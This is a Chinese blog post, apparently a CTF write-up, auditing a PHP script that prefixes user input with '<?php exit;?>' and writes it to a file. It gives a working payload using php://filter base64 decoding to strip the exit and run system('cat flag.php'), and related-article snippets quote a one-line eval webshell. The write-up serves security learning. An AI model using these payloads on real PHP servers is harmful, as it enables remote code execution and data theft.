PHP代码审计(死亡退出)

最新推荐文章于 2024-04-23 08:00:00 发布
最新推荐文章于 2024-04-23 08:00:00 发布
阅读量1.6k 收藏 2
点赞数 1
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_36609913/article/details/79320366
版权

代码:

<?php
  show_source(__FILE__);
  $c="<?php exit;?>";
  @$c.=$_POST['c'];
  @$filename=$_POST['file']; 
  if(!isset($filename))                    
  {                                       
    file_put_contents('tmp.php', ''); 
  }                                 
  @file_put_contents($filename, $c);
  include('tmp.php');
?>

大体分析代码意思为post一个字符串和一个文件名然后将字符串与给的字符串连接后写入tmp.php文件中

先看$c="<?php exit;?>";这句话会使php文件直接退出,不会执行后续代码,所以我们的目的是绕过这句话

这里的$_POST['filename']是可以控制协议的,我们即可使用 php://filter协议的base64-decode方法来绕过exit这句话

我们可以使用 php://filter/write=convert.base64-decode 来首先对其解码。在解码的过程中,字符<、?、;、>、空格等一共有7个字符不符合base64编码的字符范围将被忽略,所以最终被解码的字符仅有“phpexit”和我们传入的其他字符。“phpexit”一共7个字符,因为base64算法解码时是4个byte一组,所以给他增加1个“a”一共8个字符。这样,”phpexita”被正常解码,而后面我们传入的webshell的base64内容也被正常解码。结果就是<?php exit; ?>没有了。

所以说我POSTc=aPD9waHAgc3lzdGVtKCdjYXQgZmxhZy5waHAnKTsgPz4=

拼接后c=<?php exit;?>aPD9waHAgc3lzdGVtKCdjYXQgZmxhZy5waHAnKTsgPz4=

base64解码写入后就成了^ƫZ<?php system('cat flag.php'); ?>

所以最后POST如下即可获得flag

c=aPD9waHAgc3lzdGVtKCdjYXQgZmxhZy5waHAnKTsgPz4=&file=php://filter/write=convert.base64-decode/resource=tmp.php
EvilGenius-
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
PHP代码审计教学视频
01-28
PHP代码审计入门教学视频,对新手代码审计比较友好。对一些常规的漏洞(sqli、XSS、变量覆盖、PHPSTROM使用等等)都有非常详细的介绍
php代码审计比较有意思的例子
12-18
代码审计比较有意思的例子貌似是去年 ecshop支付漏洞偶然出来的一个例子,感觉不错。分享下 复制代码 代码如下:<?php$a=addslashes($_GET[‘a’]);$b=addslashes($_GET[‘b’]);print_r($a.' ’);print_r($b.'...
PHP死亡退出
qidiandexiaowu
10-25 178
由于Moctf平台无限期暂停使用。 昨天碰见的一道死亡退出题,没做出来,没法复现。 CTF-PHP 死亡退出 Moctf死亡退出 web 死亡退出 供以后做题使用。
php 死亡绕过
m0_75178803的博客
04-09 464
之类的限制) ,不管后面的语句是什么,都会先执行退出,导致后面的语句不执行,这也叫php死亡退出。base64编码中只包含64个可打印字符,而php在解码base64时,遇到不在其中的字符时,将会跳过这些字符,仅将合法字符组成一个新的字符串进行解码。运用到一个正则表达式,会把输入进行正则匹配,把内容里不符合条件的,比如说<?base64是四个字符一解密,前面的8个字符解密后会变成6个乱码,后面的正常解密,获得加密之前的语句。因为我们加入了一个a。
代码审计-PHP原生开发篇&SQL注入&数据库监控&正则搜索&文件定位&静态分析
最新发布
siu~
04-23 344
1、PHP审计-原生态开发-SQL注入&数据库语句监控 2、PHP审计-原生态开发-SQL注入&正则匹配搜索 3、PHP审计-原生态开发-SQL注入&功能追踪
死亡退出
Mikasa
03-20 567
最近做了一道非常有意思的题,感觉很有用,故记录于此: 题目来源:MOctf 这是一道代码审计题目,但是涉及的知识非常的实用: 题目如下: 发现我们可以通过POST传过去我们想执行的命令,但是前面但是有"<?php exit;?>" 这就会导致我们传过去的命令还未执行,就因为exit;的原因退出结束运行脚本了。。 试验一下: 执行一下: 去掉exit试试: 成功执行。。 但是要...
php代码审计资料
温和的跳跃
11-09 89
https://www.sec-wiki.com/news/search?wd=php%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1 一般sec-wiki还可以除了二进制方面的不多。。。。。搜web方面的非常容易勉强还算全面 今天:https://github.com/Jyny/pasc2at
php://filter绕过死亡exit
leekos的博客,分享web安全相关知识~
07-30 926
最近写了一道反序列化的题,其中有一个需要通过去绕过死亡exit()的小trick,这里通过一道题目来讲解。
php代码审计_PHP/JAVA代码审计资料分享
weixin_39949297的博客
12-06 568
最近在跟墨渊漏洞库的成员,学习代码审计的相关知识和练习,看了很多文章,顺便整理除了一份,资料出来。总之就是看呗,学会了还好,学不会就尴尬了。说实话,有点难啃,但是做出了自身不足的表格,感觉还可以。近几天也构建了下自己拥有的知识体系,发现都是一瓶子不满,半瓶子晃荡代码审计,虽然难啃,至少现在有一定的事情去做,近期的安排可能会写一些代码审计的知识,顺便写一些闲聊的文章放在小号上。欢迎关注。关...
PHP代码审计文档.zip
11-02
第19课:PHP代码审计之会话认证漏洞mp4 第18课:PHP伪协议mp4 第17课:PHP弱类型mp4 第16课:PHP代码审计之反序列化漏润mp4 第15课:PHP代码审计之变量盖漏洞mp4 第14课PHP代码审计之任意文件读取及删除漏洞mp4 第13课...
PHP代码审计音频文件.zip
11-02
任务19:PHP代码审计之会话认证漏洞mp4 任努18:PHP伪协议mp4 任务17:PHP弱类型mp4 任务16:PHP代码审计之反序列化漏润mp4 任务15:PHP代码审计之变量盖漏洞mp4 任务14PHP代码审计之任意文件读取及删除漏洞mp4 任务13...
php退出怎么写,php退出登录怎么写
weixin_30131185的博客
04-02 349
php退出登录的写法:首先释放当前在内存中已经创建的所有【$_SESSION】变量,代码为【session_unset】;然后删除当前用户对应的session文件以及释放session id,代码为【session_destroy()】。【相关学习推荐:php图文教程】php退出登录的写法:在PHP程序中,登录完成之后将存入session中,退出登录时,需要释放session,相应的代码如下所...
浅谈CTF中代码审计PHP死亡退出
m0re's blog
10-24 1706
前言:遇到一个代码审计的题目,略有思考。记录一下~ 源码就是这样的 <?php $content = '<?php exit; ?>'; $content .= $_POST['data']; file_put_contents($_POST['filename'], $content);
详解php://filter以及死亡绕过
热门推荐
woshilnp的博客
05-25 1万+
详解php://filter以及死亡绕过 php://filter PHP 提供了一些杂项输入/输出(IO)流,允许访问 PHP 的输入输出流、标准输入输出和错误描述符, 内存中、磁盘备份的临时文件流以及可以操作其他读取写入文件资源的过滤器。 php:// — 访问各个输入/输出流(I/O streams) php://filter 是一种元封装器, 设计用于数据流打开时的筛选过滤应用。 这对于一体式(all-in-one)的文件函数非常有用,类似 readfile()、 file() 和 file_ge
关于phpexit函数的绕过问题
https://www.cnblogs.com/zpchcbd/
04-01 2762
<?php show_source(__FILE__); $c="<?php exit;?>"; @$c.=$_POST['c']; @$filename=$_POST['file']; if(!isset($filename)) { ...
PHP一句话木马免杀学习
qq_45780190的博客
05-11 3083
PHP一句话木马免杀学习 简单了解php一句话木马原理 <?php @eval($_POST['shell']);?> 首先存在一个名为shell的变量,shell的取值为HTTP的POST方式。Web服务器对shell取值以后,然后通过eval()函数执行shell里面的内容。 将以上代码写入webshell.php文件中然后放在站点目录下通过浏览器访问,以POST方式传入shell=phpinfo(); 一句话木马的变形 常用变形函数 convert_uudecode() #解码一个
exit()和_exit()两个函数的区别
happylzs2008的专栏
10-27 285
https://blog.csdn.net/kang___xi/article/details/80545510 exit()和_exit()这两个函数都是用于函数退出,但这两者有一些细微的差别,在exit()函数里会调用_exit()函数。下面来看看exit()的函数代码大概: void exit(int status) { while(_exit_funcs != NULL) ...
MOCTF-Web-死亡退出
1stPeak's Blog
09-25 400
1、题目: 2、传送门:http://119.23.73.3:5003/ 代码: <?php show_source(__FILE__); $c="<?php exit;?>"; //$c=一个退出php代码 @$c.=$_POST['c']; //.=详解见下方:$c=$c$_POST['c']-> //$c=<?php exit;...
php基于ast代码审计
07-31
PHP基于AST代码审计是一种对PHP代码进行分析和评估的方法。AST(Abstract Syntax Tree,抽象语法树)是一种数据结构,用于表示源代码的抽象语法结构。 首先,AST能够将PHP代码解析为一颗树状结构,将代码的语法结构转化为易于处理的数据形式。通过AST,我们可以更加方便地对PHP代码进行分析和操作。 AST代码审计可以用于发现PHP代码中的潜在安全风险和漏洞。通过分析AST,我们可以检查代码中是否存在常见的安全问题,如SQL注入、跨站脚本攻击等。例如,我们可以检查代码中的输入验证、输出编码和数据库查询的安全性,以保护应用程序免受可能的攻击。 此外,AST还能够帮助我们优化PHP代码的性能和质量。通过分析AST,我们可以检查代码中的冗余、性能低下和不规范的写法,进而做出相应的优化和改进。例如,我们可以检查是否有不必要的循环、重复的代码和效率低下的函数调用,以提高代码的执行效率和可维护性。 总之,PHP基于AST代码审计是一种强大的工具,可以帮助开发者发现和修复代码中的安全漏洞和性能问题。通过分析源代码的抽象语法结构,我们可以更全面地了解代码的结构和行为,从而提高应用程序的安全性和质量。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值